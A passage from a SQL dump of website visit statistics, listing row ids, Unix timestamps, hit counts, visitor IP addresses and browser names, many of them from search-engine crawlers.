hrome'),(40663,1464066727,1,0,1,0,'66.249.66.76',''),(40664,1464067338,1,1,0,0,'91.196.178.135','firefox'),(40665,1464068013,1,1,0,0,'94.179.85.226','firefox'),(40666,1464068061,1,1,0,0,'66.102.9.103','chrome'),(40667,1464068179,1,1,0,0,'66.249.66.76','chrome'),(40668,1464069539,1,1,0,0,'62.122.206.148','chrome'),(40669,1464069584,1,1,0,0,'91.196.178.69','firefox'),(40670,1464069830,1,1,0,0,'91.196.178.71','firefox'),(40671,1464071418,3,3,0,0,'62.122.206.148','chrome'),(40672,1464072287,1,1,0,0,'93.73.234.193','firefox'),(40673,1464072295,1,1,0,0,'107.21.1.8','other'),(40674,1464073486,1,1,0,0,'62.122.206.148','chrome'),(40675,1464073858,1,1,0,0,'91.196.178.69','firefox'),(40676,1464073936,1,1,0,0,'93.77.254.254','chrome'),(40677,1464074046,1,1,0,0,'91.196.178.167','chrome'),(40678,1464074350,1,1,0,0,'40.77.167.82','other'),(40679,1464075876,1,1,0,0,'94.179.126.120','firefox'),(40680,1464076079,1,1,0,0,'40.77.167.27','other'),(40681,1464076676,1,1,0,0,'91.196.178.69','chrome'),(40682,1464076870,1,1,0,0,'91.196.178.69','firefox'),(40683,1464076997,1,1,0,0,'207.46.13.188','other'),(40684,1464077361,1,0,1,0,'66.249.66.57',''),(40685,1464078256,1,1,0,0,'109.227.112.66','chrome'),(40686,1464079193,1,1,0,0,'91.196.178.67','chrome'),(40687,1464080581,1,1,0,0,'91.196.178.135','firefox'),(40688,1464081028,1,1,0,0,'91.196.178.167','chrome'),(40689,1464083358,1,1,0,0,'94.179.55.238','firefox'),(40690,1464083374,1,1,0,0,'178.94.39.82','firefox'),(40691,1464083635,1,1,0,0,'94.179.0.105','chrome'),(40692,1464083849,1,1,0,0,'178.93.86.121','chrome'),(40693,1464084824,2,2,0,0,'94.178.104.201','opera'),(40694,1464085688,1,1,0,0,'62.122.206.148','chrome'),(40695,1464086454,1,0,1,0,'66.249.66.54',''),(40696,1464088779,1,1,0,0,'37.52.19.221','chrome'),(40697,1464090900,1,1,0,0,'91.196.178.168','firefox'),(40698,1464091027,1,1,0,0,'46.201.254.78','chrome'),(40699,1464091118,1,1,0,0,'180.76.15.141','other'),(40700,1464091397,1,1,0,0,'46.200.105.74','firefox'),(40701,1464091534,1,1,0,0,'91.196.178.69','firefox'),(40702,1464091808,1,1,0,0,'91.196.178.167','chrome'),(40703,1464093446,1,0,1,0,'66.249.66.57',''),(40704,1464094254,1,1,0,0,'91.205.66.134','chrome'),(40705,1464094338,1,1,0,0,'87.244.179.70','firefox'),(40706,1464095205,1,0,1,0,'68.180.231.33',''),(40707,1464097803,1,1,0,0,'91.196.178.69','firefox'),(40708,1464098028,1,1,0,0,'91.196.178.130','other'),(40709,1464098551,1,1,0,0,'130.193.50.34','other'),(40710,1464098883,1,1,0,0,'37.52.16.20','firefox'),(40711,1464101297,1,1,0,0,'66.249.93.147','chrome'),(40712,1464101579,1,1,0,0,'66.249.66.57','chrome'),(40713,1464101870,1,1,0,0,'91.196.178.35','firefox'),(40714,1464102040,1,0,1,0,'66.249.66.82',''),(40715,1464102632,1,1,0,0,'91.196.177.15','firefox'),(40716,1464102776,1,1,0,0,'91.196.178.72','firefox'),(40717,1464103033,1,1,0,0,'94.179.0.105','chrome'),(40718,1464104099,1,0,1,0,'66.249.66.57',''),(40719,1464104570,1,1,0,0,'40.77.167.82','other'),(40720,1464106980,1,1,0,0,'180.76.15.138','other'),(40721,1464108567,1,1,0,0,'130.193.50.34','other'),(40722,1464108739,1,0,1,0,'66.249.66.76',''),(40723,1464108990,1,1,0,0,'180.76.15.11','other'),(40724,1464111020,1,0,1,0,'66.249.66.57',''),(40725,1464112068,1,0,1,0,'66.249.66.76',''),(40726,1464112787,1,1,0,0,'130.193.50.34','other'),(40727,1464113189,1,1,0,0,'94.179.32.142','firefox'),(40728,1464113342,1,1,0,0,'92.113.156.126','firefox'),(40729,1464114574,1,0,1,0,'66.249.66.79',''),(40730,1464114633,1,0,1,0,'66.249.66.82',''),(40731,1464115246,1,1,0,0,'91.196.178.37','chrome'),(40732,1464115916,1,1,0,0,'213.179.252.246','chrome'),(40733,1464116403,1,0,1,0,'66.249.66.76',''),(40734,1464117139,1,0,1,0,'66.249.66.54',''),(40735,1464117198,1,1,0,0,'40.77.167.82','other'),(40736,1464120404,1,1,0,0,'91.196.178.166','firefox'),(40737,1464120762,1,0,1,0,'66.249.66.79',''),(40738,1464122595,1,0,1,0,'66.249.66.82',''),(40739,1464122646,1,0,1,0,'66.249.66.79',''),(40740,1464123451,1,1,0,0,'141.8.183.25','other'),(40741,1464123721,3,0,3,0,'66.249.66.79',''),(40742,1464124339,1,0,1,0,'66.249.66.54',''),(40743,1464124618,1,1,0,0,'5.255.253.113','other'),(40744,1464125802,1,0,1,0,'66.249.66.82',''),(40745,1464126290,1,0,1,0,'66.249.66.57',''),(40746,1464127235,1,1,0,0,'141.8.132.105','other'),(40747,1464127929,1,1,0,0,'157.55.39.110','other'),(40748,1464128257,1,0,1,0,'66.249.66.79',''),(40749,1464130773,1,0,1,0,'66.249.66.57',''),(40750,1464131005,1,1,0,0,'130.193.50.34','other'),(40751,1464132071,1,0,1,0,'66.249.69.175',''),(40752,1464134658,1,1,0,0,'40.77.167.27','other'),(40753,1464134711,1,0,1,0,'66.249.75.32',''),(40754,1464136836,1,0,1,0,'66.249.75.40',''),(40755,1464138255,1,1,0,0,'141.8.132.105','other'),(40756,1464138776,1,0,1,0,'66.249.69.170',''),(40757,1464147251,1,0,1,0,'66.249.75.40',''),(40758,1464147932,1,1,0,0,'40.77.167.82','other'),(40759,1464150051,1,0,1,0,'66.249.69.170',''),(40760,1464150377,1,1,0,0,'173.208.201.10','other'),(40761,1464152513,1,1,0,0,'130.193.50.34','other'),(40762,1464152631,1,1,0,0,'46.201.242.237','firefox'),(40763,1464153581,1,1,0,0,'62.122.206.148','chrome'),(40764,1464153724,1,1,0,0,'51.254.141.30','other'),(40765,1464154347,1,1,0,0,'91.196.178.135','firefox'),(40766,1464156215,1,1,0,0,'46.211.1.114','other'),(40767,1464157614,1,1,0,0,'178.93.148.7','firefox'),(40768,1464157712,1,1,0,0,'195.162.71.207','chrome'),(40769,1464157746,1,0,1,0,'66.249.75.48',''),(40770,1464157758,1,0,1,0,'66.249.75.32',''),(40771,1464158077,1,0,1,0,'68.180.231.49',''),(40772,1464158224,1,1,0,0,'109.227.96.249','opera'),(40773,1464159738,1,1,0,0,'178.92.149.92','firefox'),(40774,1464159916,1,1,0,0,'91.196.178.69','firefox'),(40775,1464160971,1,0,1,0,'68.180.231.49',''),(40776,1464161200,1,1,0,0,'40.77.167.27','other'),(40777,1464161203,1,1,0,0,'95.132.123.74','chrome'),(40778,1464162379,1,0,1,0,'66.249.75.48',''),(40779,1464162380,1,0,1,0,'66.249.75.40',''),(40780,1464162868,1,1,0,0,'109.227.96.249','firefox'),(40781,1464163165,1,1,0,0,'91.196.178.67','chrome'),(40782,1464163693,1,1,0,0,'91.196.178.69','firefox'),(40783,1464164268,1,0,1,0,'68.180.231.49',''),(40784,1464165732,1,0,1,0,'66.249.69.180',''),(40785,1464166307,1,1,0,0,'141.8.132.105','other'),(40786,1464166362,1,1,0,0,'130.193.50.34','other'),(40787,1464167306,1,1,0,0,'37.52.16.20','chrome'),(40788,1464167790,1,0,1,0,'66.249.75.48',''),(40789,1464168855,1,1,0,0,'91.196.178.69','firefox'),(40790,1464169008,1,1,0,0,'91.196.178.167','firefox'),(40791,1464169868,2,2,0,0,'91.196.178.69','firefox'),(40792,1464171488,1,0,1,0,'66.249.69.170',''),(40793,1464171522,1,0,1,0,'66.249.75.32',''),(40794,1464172059,1,1,0,0,'91.196.178.134','firefox'),(40795,1464172497,1,1,0,0,'91.196.178.135','firefox'),(40796,1464172499,2,2,0,0,'46.201.239.218','firefox'),(40797,1464173609,1,1,0,0,'178.92.139.108','chrome'),(40798,1464175606,1,1,0,0,'91.196.178.69','firefox'),(40799,1464176015,1,0,1,0,'66.249.75.40',''),(40800,1464176089,13,13,0,0,'77.250.107.12','other'),(40801,1464176281,1,1,0,0,'212.55.69.117','chrome'),(40802,1464177425,1,1,0,0,'31.40.16.142','chrome'),(40803,1464178237,1,0,1,0,'66.249.75.32',''),(40804,1464178403,1,1,0,0,'66.249.69.180','chrome'),(40805,1464179605,1,1,0,0,'92.113.162.174','opera'),(40806,1464180791,1,0,1,0,'68.180.231.49',''),(40807,1464182284,1,1,0,0,'62.122.207.77','chrome'),(40808,1464182377,1,1,0,0,'95.220.91.187','chrome'),(40809,1464182378,1,1,0,0,'95.26.244.179','other'),(40811,1464183559,1,1,0,0,'91.196.178.69','firefox'),(40812,1464183660,1,1,0,0,'194.44.238.62','chrome'),(40813,1464184977,1,1,0,0,'141.8.132.105','other'),(40814,1464185423,1,1,0,0,'91.196.178.167','firefox'),(40815,1464186382,1,1,0,0,'173.234.153.122','other'),(40816,1464186935,1,1,0,0,'91.196.178.35','firefox'),(40817,1464187148,2,2,0,0,'62.122.207.77','chrome'),(40818,1464189187,1,1,0,0,'37.115.72.239','chrome'),(40819,1464189885,1,1,0,0,'91.196.178.65','firefox'),(40820,1464192412,1,1,0,0,'157.55.39.229','other'),(40821,1464196287,1,1,0,0,'94.179.86.252','chrome'),(40822,1464196952,1,1,0,0,'92.113.190.206','firefox'),(40823,1464198205,1,1,0,0,'188.163.5.62','chrome'),(40824,1464198819,1,1,0,0,'37.55.226.220','chrome'),(40825,1464199247,1,1,0,0,'141.8.183.25','other'),(40826,1464200458,1,1,0,0,'94.179.97.120','firefox'),(40827,1464200720,1,1,0,0,'37.52.18.52','chrome'),(40828,1464203998,1,1,0,0,'92.113.190.206','firefox'),(40829,1464207547,1,1,0,0,'95.132.60.23','chrome'),(40830,1464210305,1,1,0,0,'130.193.50.34','other'),(40831,1464210901,1,1,0,0,'141.8.183.25','other'),(40832,1464211117,1,1,0,0,'178.154.189.202','other'),(40833,1464212182,1,1,0,0,'95.132.60.23','chrome'),(40834,1464212967,1,1,0,0,'207.46.13.16','other'),(40835,1464213845,1,1,0,0,'130.193.50.34','other'),(40836,1464214025,1,1,0,0,'141.8.132.105','other'),(40837,1464214589,1,0,1,0,'66.249.65.107',''),(40838,1464217833,1,1,0,0,'66.249.65.118','chrome'),(40839,1464217979,1,0,1,0,'66.249.65.107',''),(40840,1464218281,1,0,1,0,'66.249.65.121',''),(40841,1464220338,1,0,1,0,'66.249.65.124',''),(40842,1464221767,4,4,0,0,'213.251.184.38','other'),(40843,1464222863,3,3,0,0,'89.163.148.58','other'),(40844,1464224505,1,1,0,0,'188.32.208.20','chrome'),(40845,1464224664,1,1,0,0,'5.255.253.113','other'),(40846,1464224714,1,1,0,0,'130.193.50.34','other'),(40847,1464226299,1,1,0,0,'158.69.241.154','other'),(40848,1464226654,1,1,0,0,'40.77.167.82','other'),(40849,1464232165,1,0,1,0,'66.249.65.104',''),(40850,1464232169,1,1,0,0,'141.8.132.105','other'),(40851,1464233870,1,0,1,0,'68.180.231.49',''),(40852,1464237324,1,1,0,0,'91.196.178.101','chrome'),(40853,1464238106,1,0,1,0,'66.249.65.121',''),(40854,1464239475,1,1,0,0,'141.8.183.25','other'),(40855,1464241477,1,1,0,0,'66.249.93.147','chrome'),(40856,1464241612,1,0,1,0,'68.180.231.49',''),(40857,1464241692,1,1,0,0,'91.124.175.128','chrome'),(40858,1464241818,1,1,0,0,'46.200.103.192','chrome'),(40859,1464242515,1,1,0,0,'141.8.132.105','other'),(40860,1464242723,1,1,0,0,'91.196.178.135','firefox'),(40861,1464242725,1,1,0,0,'95.221.204.181','chrome'),(40862,1464242913,1,1,0,0,'188.32.208.20','chrome'),(40863,1464242933,1,1,0,0,'91.196.178.35','firefox'),(40864,1464242972,1,1,0,0,'46.200.103.192','chrome'),(40865,1464243669,1,1,0,0,'62.122.207.77','chrome'),(40866,1464245102,1,1,0,0,'91.196.178.68','firefox'),(40867,1464246299,1,1,0,0,'141.8.132.105','other'),(40868,1464246442,1,1,0,0,'91.196.177.96','firefox'),(40869,1464247394,1,1,0,0,'141.8.183.25','other'),(40870,1464247433,1,1,0,0,'88.135.218.123','chrome'),(40871,1464247775,1,1,0,0,'178.92.149.92','firefox'),(40872,1464248626,1,1,0,0,'193.109.145.179','chrome'),(40873,1464249076,1,1,0,0,'193.194.127.207','chrome'),(40874,1464249732,1,1,0,0,'91.196.178.69','firefox'),(40875,1464249748,1,1,0,0,'82.145.223.56','opera'),(40876,1464249750,2,2,0,0,'91.196.178.69','chrome'),(40877,1464249837,1,0,1,0,'66.249.65.124',''),(40878,1464250933,1,1,0,0,'91.196.178.69','chrome'),(40879,1464251033,1,1,0,0,'157.55.39.229','other'),(40880,1464251089,1,1,0,0,'91.192.135.241','firefox'),(40881,1464251222,1,1,0,0,'91.231.229.41','chrome'),(40882,1464251978,1,1,0,0,'37.52.134.6','chrome'),(40883,1464252743,1,1,0,0,'193.194.127.207','chrome'),(40884,1464253338,1,1,0,0,'141.8.132.105','other'),(40885,1464253677,1,1,0,0,'178.92.149.92','firefox'),(40886,1464253941,1,1,0,0,'213.111.81.64','chrome'),(40887,1464254572,1,1,0,0,'207.241.226.232','other'),(40888,1464254933,1,1,0,0,'94.179.54.55','firefox'),(40889,1464255077,1,1,0,0,'95.135.44.93','chrome'),(40890,1464255622,1,0,1,0,'68.180.231.49',''),(40891,1464255889,1,1,0,0,'37.53.230.40','firefox'),(40892,1464256293,1,1,0,0,'91.202.128.4','firefox'),(40893,1464256294,4,0,4,0,'66.249.65.101',''),(40894,1464258424,1,1,0,0,'78.25.47.76','chrome'),(40895,1464260738,1,1,0,0,'176.15.206.155','chrome'),(40896,1464260908,1,1,0,0,'91.196.178.69','chrome'),(40897,1464261015,1,1,0,0,'193.194.127.224','chrome'),(40898,1464261025,1,1,0,0,'176.77.119.40','chrome'),(40899,1464261257,1,1,0,0,'91.196.178.135','firefox'),(40900,1464261338,1,1,0,0,'93.81.79.200','other'),(40901,1464261529,1,1,0,0,'180.76.15.163','other'),(40902,1464262318,1,1,0,0,'91.213.33.104','firefox'),(40903,1464262376,1,1,0,0,'5.58.82.4','firefox'),(40904,1464263013,1,1,0,0,'37.53.230.40','firefox'),(40905,1464263312,1,1,0,0,'37.55.71.44','chrome'),(40906,1464263699,1,1,0,0,'91.196.178.69','firefox'),(40907,1464264378,1,0,1,0,'66.249.65.121',''),(40908,1464265798,1,1,0,0,'94.153.192.46','firefox'),(40909,1464266584,1,1,0,0,'91.196.178.69','firefox'),(40910,1464267968,1,1,0,0,'95.134.10.211','chrome'),(40911,1464268584,1,1,0,0,'91.196.178.69','firefox'),(40912,1464269497,1,1,0,0,'213.109.128.137','other'),(40913,1464269797,1,1,0,0,'37.55.71.44','chrome'),(40914,1464270794,1,1,0,0,'94.179.71.48','firefox'),(40915,1464270994,1,1,0,0,'91.196.178.69','firefox'),(40916,1464275431,1,1,0,0,'37.52.23.149','firefox'),(40917,1464275873,1,0,1,0,'66.249.75.40',''),(40918,1464276089,1,1,0,0,'91.196.178.66','firefox'),(40919,1464279701,1,0,1,0,'66.249.69.180',''),(40920,1464280452,1,1,0,0,'144.76.93.46','other'),(40921,1464280880,1,1,0,0,'180.76.15.32','other'),(40922,1464283406,1,1,0,0,'178.154.189.202','other'),(40923,1464284899,1,1,0,0,'180.76.15.26','other'),(40924,1464285055,1,1,0,0,'66.249.69.175','chrome'),(40925,1464285642,1,1,0,0,'37.55.224.5','firefox'),(40926,1464287893,1,1,0,0,'94.179.59.191','chrome'),(40927,1464288528,2,2,0,0,'37.55.224.5','firefox'),(40928,1464288575,2,0,2,0,'66.249.75.40',''),(40929,1464289178,1,1,0,0,'178.94.172.156','chrome'),(40930,1464295210,1,1,0,0,'94.73.167.227','firefox'),(40931,1464296155,1,1,0,0,'141.8.132.105','other'),(40932,1464296178,1,0,1,0,'66.249.75.40',''),(40933,1464298235,1,0,1,0,'68.180.231.49',''),(40934,1464300526,1,1,0,0,'52.3.105.23','other'),(40935,1464300618,1,1,0,0,'40.77.167.19','other'),(40936,1464300810,1,1,0,0,'64.246.165.170','firefox'),(40937,1464301517,2,2,0,0,'52.3.105.23','other'),(40938,1464301826,1,1,0,0,'178.154.189.31','other'),(40939,1464302885,1,1,0,0,'52.3.105.23','other'),(40940,1464306063,1,1,0,0,'66.249.69.180','chrome'),(40941,1464307345,1,1,0,0,'95.26.156.178','chrome'),(40942,1464308742,1,1,0,0,'52.3.105.23','other'),(40943,1464310318,1,1,0,0,'95.221.211.133','other'),(40944,1464310720,1,1,0,0,'176.77.119.36','chrome'),(40945,1464311376,1,1,0,0,'52.3.105.23','other'),(40946,1464311709,2,0,2,0,'66.249.69.170',''),(40947,1464311718,1,0,1,0,'66.249.69.175',''),(40948,1464312484,3,3,0,0,'52.3.105.23','other'),(40949,1464317682,1,1,0,0,'157.55.39.229','other'),(40950,1464319198,2,2,0,0,'52.3.105.23','other'),(40951,1464319329,1,1,0,0,'193.194.127.217','firefox'),(40952,1464319532,1,1,0,0,'82.145.209.166','other'),(40953,1464321927,1,1,0,0,'130.193.50.34','other'),(40954,1464322059,1,1,0,0,'5.255.253.113','other'),(40955,1464322662,1,1,0,0,'93.158.152.84','other'),(40956,1464324299,1,1,0,0,'94.179.59.191','chrome'),(40957,1464324348,1,0,1,0,'66.249.69.175',''),(40958,1464325690,1,1,0,0,'86.122.244.157','firefox'),(40959,1464326140,1,1,0,0,'91.196.178.69','chrome'),(40960,1464326243,1,1,0,0,'91.196.178.69','firefox'),(40961,1464326598,1,1,0,0,'66.249.75.40','chrome'),(40962,1464326893,1,1,0,0,'91.196.178.39','chrome'),(40963,1464327104,1,1,0,0,'66.249.69.180','chrome'),(40964,1464327116,1,1,0,0,'91.196.178.135','firefox'),(40965,1464327747,1,1,0,0,'91.196.178.162','chrome'),(40966,1464328233,1,0,1,0,'66.249.75.48',''),(40967,1464328301,1,1,0,0,'52.3.105.23','other'),(40968,1464328423,1,1,0,0,'66.249.69.175','chrome'),(40969,1464328510,1,1,0,0,'66.249.69.170','chrome'),(40970,1464328574,1,1,0,0,'66.102.9.103','chrome'),(40971,1464329087,1,1,0,0,'82.207.91.234','firefox'),(40972,1464329167,1,1,0,0,'178.95.247.147','firefox'),(40973,1464330778,1,1,0,0,'91.196.178.69','chrome'),(40974,1464332118,1,1,0,0,'91.196.178.135','firefox'),(40975,1464333466,1,1,0,0,'94.179.12.226','firefox'),(40976,1464334501,1,1,0,0,'178.95.247.147','firefox'),(40977,1464336659,1,1,0,0,'52.3.105.23','other'),(40978,1464337416,1,1,0,0,'91.228.236.104','chrome'),(40979,1464337424,1,1,0,0,'207.241.225.227','other'),(40981,1464337425,1,1,0,0,'173.252.90.127','other'),(40982,1464338448,1,0,1,0,'66.249.69.180',''),(40983,1464339300,1,1,0,0,'178.95.247.147','firefox'),(40984,1464339938,2,2,0,0,'91.196.178.69','firefox'),(40985,1464341791,1,1,0,0,'91.196.178.69','firefox'),(40986,1464341816,2,2,0,0,'213.251.184.38','other'),(40987,1464342308,1,1,0,0,'94.179.90.179','firefox'),(40988,1464343892,1,1,0,0,'5.58.82.4','firefox'),(40989,1464345262,1,1,0,0,'91.196.178.69','chrome'),(40990,1464345607,1,1,0,0,'91.196.178.35','firefox'),(40991,1464346414,1,1,0,0,'94.179.90.65','firefox'),(40992,1464346453,1,1,0,0,'52.3.105.23','other'),(40993,1464347754,1,1,0,0,'141.8.132.105','other'),(40994,1464347940,2,2,0,0,'130.193.50.34','other'),(40995,1464348378,1,1,0,0,'37.52.173.167','chrome'),(40996,1464348629,1,1,0,0,'91.196.178.68','firefox'),(40997,1464348912,1,1,0,0,'213.227.195.79','chrome'),(40998,1464349965,1,1,0,0,'141.8.132.105','other'),(40999,1464350130,1,1,0,0,'130.193.50.34','other'),(41000,1464350717,1,1,0,0,'92.113.127.158','firefox'),(41001,1464350870,2,2,0,0,'91.225.109.182','firefox'),(41002,1464350871,1,1,0,0,'91.244.26.220','chrome'),(41003,1464350909,1,1,0,0,'52.3.105.23','other'),(41004,1464351151,1,1,0,0,'130.193.51.19','other'),(41005,1464351435,1,1,0,0,'130.193.50.34','other'),(41006,1464351630,1,1,0,0,'95.221.225.187','chrome'),(41008,1464351631,1,1,0,0,'188.32.106.6','chrome'),(41009,1464351634,1,1,0,0,'178.140.87.235','msie'),(41010,1464351635,1,1,0,0,'46.242.118.253','chrome'),(41011,1464352768,1,1,0,0,'94.179.90.65','firefox'),(41012,1464353346,1,1,0,0,'157.55.39.26','other'),(41013,1464355956,1,1,0,0,'178.95.247.147','firefox'),(41014,1464356444,1,1,0,0,'94.179.74.213','chrome'),(41015,1464357452,1,1,0,0,'66.249.93.150','chrome'),(41016,1464358277,1,1,0,0,'5.255.253.113','other'),(41017,1464360752,1,0,1,0,'66.249.69.180',''),(41018,1464361108,1,0,1,0,'66.249.69.170',''),(41019,1464361255,3,3,0,0,'207.46.13.103','other'),(41020,1464361269,2,2,0,0,'157.55.39.80','other'),(41021,1464361271,1,1,0,0,'40.77.167.82','other'),(41022,1464362480,1,0,1,0,'66.249.69.175',''),(41023,1464362681,1,1,0,0,'92.113.191.184','firefox'),(41024,1464363514,1,0,1,0,'66.249.69.170',''),(41025,1464363831,1,0,1,0,'66.249.75.40',''),(41026,1464364470,1,1,0,0,'52.3.105.23','other'),(41027,1464366179,1,1,0,0,'157.55.39.80','other'),(41028,1464366223,1,1,0,0,'130.193.50.34','other'),(41029,1464366967,1,0,1,0,'66.249.75.48',''),(41030,1464367569,1,1,0,0,'82.145.208.216','other'),(41031,1464367733,1,1,0,0,'82.145.208.216','opera'),(41032,1464368010,1,1,0,0,'66.249.75.48','chrome'),(41033,1464368720,1,1,0,0,'5.35.93.15','firefox'),(41034,1464368915,1,1,0,0,'94.179.122.131','firefox'),(41035,1464370066,2,2,0,0,'94.179.30.166','chrome'),(41036,1464372844,1,1,0,0,'92.113.191.184','firefox'),(41037,1464373500,1,1,0,0,'5.255.253.113','other'),(41038,1464375842,1,1,0,0,'91.196.178.161','chrome'),(41039,1464375961,1,1,0,0,'91.196.178.72','chrome'),(41040,1464376297,1,0,1,0,'66.249.69.180',''),(41041,1464377194,1,1,0,0,'91.196.178.167','firefox'),(41042,1464377993,1,1,0,0,'141.8.132.105','other'),(41043,1464378483,1,1,0,0,'130.193.50.34','other'),(41044,1464380242,3,3,0,0,'91.198.143.116','other'),(41045,1464380547,1,1,0,0,'130.193.50.34','other'),(41046,1464380863,1,1,0,0,'95.133.150.229','chrome'),(41047,1464380882,1,1,0,0,'141.8.142.58','other'),(41048,1464382733,1,1,0,0,'141.8.183.25','other'),(41049,1464383431,1,1,0,0,'178.154.149.11','other'),(41051,1464385567,1,1,0,0,'141.8.132.105','other'),(41052,1464385571,2,2,0,0,'5.255.253.113','other'),(41053,1464386803,1,1,0,0,'141.8.132.105','other'),(41054,1464386924,2,2,0,0,'141.8.183.25','other'),(41055,1464387231,1,1,0,0,'5.255.253.36','other'),(41056,1464387924,1,1,0,0,'141.8.183.25','other'),(41057,1464388452,2,2,0,0,'141.8.132.105','other'),(41058,1464388476,1,1,0,0,'66.249.78.171','chrome'),(41059,1464389218,1,1,0,0,'207.46.13.1','other'),(41060,1464389337,1,1,0,0,'130.193.50.34','other'),(41061,1464389460,1,1,0,0,'5.255.253.113','other'),(41062,1464389519,1,1,0,0,'141.8.183.25','other'),(41063,1464389613,1,0,1,0,'66.249.78.171',''),(41064,1464390940,1,1,0,0,'5.255.253.113','other'),(41065,1464391419,1,1,0,0,'130.193.51.83','other'),(41066,1464391466,3,3,0,0,'130.193.50.34','other'),(41067,1464392620,1,1,0,0,'130.193.50.34','other'),(41068,1464393208,1,1,0,0,'130.193.51.43','other'),(41069,1464393212,1,1,0,0,'141.8.142.58','other'),(41070,1464393263,1,1,0,0,'66.249.78.164','chrome'),(41071,1464393909,2,2,0,0,'141.8.132.105','other'),(41072,1464395500,2,2,0,0,'141.8.183.25','other'),(41073,1464395893,1,1,0,0,'95.221.225.187','chrome'),(41074,1464395894,1,1,0,0,'176.195.115.164','chrome'),(41075,1464395896,1,1,0,0,'93.80.167.90','chrome'),(41076,1464395900,1,1,0,0,'95.25.243.118','msie'),(41077,1464395901,1,1,0,0,'128.72.54.122','chrome'),(41078,1464396140,2,2,0,0,'141.8.132.105','other'),(41079,1464397142,1,1,0,0,'130.193.50.34','other'),(41080,1464397642,1,1,0,0,'141.8.132.105','other'),(41081,1464398845,1,0,1,0,'66.249.78.143',''),(41082,1464399059,1,1,0,0,'141.8.183.25','other'),(41083,1464399587,1,1,0,0,'141.8.132.2','other'),(41084,1464399590,1,1,0,0,'141.8.142.58','other'),(41085,1464399593,1,1,0,0,'141.8.132.30','other'),(41086,1464399614,1,1,0,0,'141.8.183.14','other'),(41087,1464399623,1,1,0,0,'130.193.50.4','other'),(41088,1464399709,2,2,0,0,'141.8.132.105','other'),(41089,1464401262,1,1,0,0,'141.8.183.25','other'),(41090,1464401736,1,1,0,0,'66.249.78.150','chrome'),(41091,1464402132,1,1,0,0,'130.193.50.34','other'),(41092,1464402140,1,1,0,0,'141.8.132.105','other'),(41093,1464403224,1,1,0,0,'130.193.50.34','other'),(41094,1464403428,1,0,1,0,'66.249.78.178',''),(41095,1464403581,1,1,0,0,'141.8.132.105','other'),(41096,1464403743,2,2,0,0,'141.8.183.25','other'),(41097,1464403826,1,1,0,0,'5.255.253.113','other'),(41098,1464405467,1,1,0,0,'5.255.253.100','other'),(41099,1464405666,1,1,0,0,'5.255.253.26','other'),(41100,1464406524,1,0,1,0,'66.249.78.143',''),(41101,1464406548,2,2,0,0,'173.234.159.250','other'),(41102,1464408378,1,1,0,0,'130.193.50.4','other'),(41103,1464408918,1,1,0,0,'130.193.50.34','other'),(41104,1464410277,1,0,1,0,'66.249.66.76',''),(41105,1464410281,1,0,1,0,'66.249.78.164',''),(41106,1464410634,1,1,0,0,'66.249.78.178','chrome'),(41107,1464410648,1,1,0,0,'66.249.78.171','chrome'),(41108,1464411252,1,1,0,0,'141.8.183.14','other'),(41109,1464411255,1,1,0,0,'93.158.152.40','other'),(41110,1464412104,1,1,0,0,'157.55.39.80','other'),(41111,1464413056,1,1,0,0,'94.179.74.152','firefox'),(41112,1464413571,1,0,1,0,'66.249.78.164',''),(41113,1464416419,1,1,0,0,'91.196.178.135','firefox'),(41114,1464417534,1,0,1,0,'66.249.78.164',''),(41115,1464418257,1,1,0,0,'193.194.127.217','firefox'),(41116,1464418445,1,1,0,0,'77.121.199.63','chrome'),(41117,1464418961,1,1,0,0,'81.30.164.23','chrome'),(41118,1464421445,1,0,1,0,'66.249.78.178',''),(41119,1464421479,1,0,1,0,'66.249.78.150',''),(41120,1464422861,1,0,1,0,'66.249.78.171',''),(41121,1464424122,1,1,0,0,'130.193.50.34','other'),(41122,1464424828,1,0,1,0,'66.249.78.143',''),(41123,1464424843,1,0,1,0,'66.249.78.178',''),(41124,1464426022,20,20,0,0,'78.46.50.246','other'),(41125,1464428893,1,1,0,0,'5.35.93.15','other'),(41126,1464429907,1,1,0,0,'66.249.93.153','chrome'),(41127,1464430336,1,1,0,0,'92.113.191.184','firefox'),(41128,1464430415,2,0,2,0,'66.249.78.164',''),(41129,1464432108,1,0,1,0,'66.249.78.171',''),(41130,1464432109,1,0,1,0,'66.249.78.136',''),(41131,1464432110,1,0,1,0,'66.249.78.178',''),(41132,1464432722,2,2,0,0,'91.196.178.135','firefox'),(41133,1464432875,1,1,0,0,'178.54.82.135','firefox'),(41134,1464434932,1,1,0,0,'5.35.93.15','other'),(41135,1464435556,1,0,1,0,'66.249.78.178',''),(41136,1464436141,1,1,0,0,'178.154.189.203','other'),(41137,1464437296,1,0,1,0,'66.249.78.171',''),(41138,1464437549,1,1,0,0,'5.35.93.15','other'),(41139,1464443130,1,1,0,0,'180.76.15.5','other'),(41140,1464443247,2,2,0,0,'178.154.189.202','other'),(41141,1464445127,2,0,2,0,'66.249.66.82',''),(41142,1464445410,1,0,1,0,'66.249.78.171',''),(41143,1464445804,1,1,0,0,'92.113.191.184','firefox'),(41144,1464447124,2,2,0,0,'178.154.189.202','other'),(41145,1464447956,2,0,2,0,'66.249.78.143',''),(41146,1464451214,1,1,0,0,'173.208.201.10','other'),(41147,1464451282,1,1,0,0,'178.154.189.202','other'),(41148,1464451800,1,1,0,0,'130.193.50.34','other'),(41149,1464452871,1,1,0,0,'91.196.178.35','firefox'),(41150,1464453984,1,1,0,0,'178.154.189.203','other'),(41151,1464455046,1,0,1,0,'66.249.78.136',''),(41152,1464455678,1,1,0,0,'193.110.18.45','chrome'),(41153,1464457808,1,1,0,0,'180.76.15.161','other'),(41154,1464458163,1,0,1,0,'66.249.78.178',''),(41155,1464458260,1,1,0,0,'5.9.62.130','other'),(41156,1464458412,1,1,0,0,'92.113.191.184','firefox'),(41157,1464458707,1,1,0,0,'141.8.132.105','other'),(41158,1464458724,1,1,0,0,'141.8.183.25','other'),(41159,1464460235,1,0,1,0,'66.249.78.136',''),(41160,1464461769,1,1,0,0,'178.154.189.202','other'),(41161,1464463509,1,0,1,0,'66.249.78.178',''),(41162,1464465605,1,0,1,0,'66.249.78.171',''),(41163,1464465704,1,1,0,0,'141.8.183.25','other'),(41164,1464466199,1,1,0,0,'66.249.66.82','chrome'),(41165,1464467625,1,1,0,0,'82.145.211.126','other'),(41166,1464467993,1,0,1,0,'66.249.78.150',''),(41167,1464468010,1,0,1,0,'66.249.78.164',''),(41168,1464469577,1,1,0,0,'93.158.152.61','other'),(41169,1464469783,1,1,0,0,'93.158.152.40','other'),(41170,1464471612,4,4,0,0,'51.255.36.86','other'),(41171,1464474220,1,0,1,0,'66.249.66.60',''),(